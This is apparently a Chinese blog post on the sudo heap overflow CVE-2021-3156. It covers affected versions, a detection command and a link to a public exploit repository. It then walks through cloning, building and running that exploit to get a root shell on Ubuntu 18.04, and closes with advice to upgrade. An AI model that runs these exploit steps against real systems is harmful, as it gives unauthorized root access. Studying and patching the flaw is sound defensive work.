漏洞简介

sudo命令加上-s或-i参数运行时,命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。

漏洞影响范围

Sudo 1.8.2 - 1.8.31p2
Sudo 1.9.0 - 1.9.5p1

漏洞检测

非root的账户,运行sudoedit -s /命令
如果出现以"sudoedit:"开头的错误响应,则系统受到此漏洞影响;如果出现以"usage:"开头的错误响应,则表示该漏洞已被补丁修复。

exp地址

https://github.com/blasty/CVE-2021-3156

复现

命令:

git clone https://github.com/blasty/CVE-2021-3156.git

正克隆到 'CVE-2021-3156'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (18/18), done.
remote: Total 24 (delta 10), reused 19 (delta 6), pack-reused 0
展开对象中: 100% (24/24), 完成.

cd CVE-2021-3156/
make

rm -rf libnss_X
mkdir libnss_X
gcc -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty <[email protected]>
usage: ./sudo-hax-me-a-sandwich
available targets:`
`------------------------------------------------------------
0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
------------------------------------------------------------`

sudo -V

Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty <[email protected]>
using target: 'Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27'
pray for your rootshell..
[+] bl1ng bl1ng! We got it!
sh-4.4#whoami
root
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root)

漏洞处理

及时升级sudo至最新版本。
下载链接:
https://www.sudo.ws/dist/

参考:
https://www.cnblogs.com/thelostworld/p/14351906.html
https://www.venustech.com.cn/new_type/aqtg/20210127/22339.html

最后修改:2021 年 06 月 04 日 09 : 37 AM
如果觉得我的文章对你有用,请随意赞赏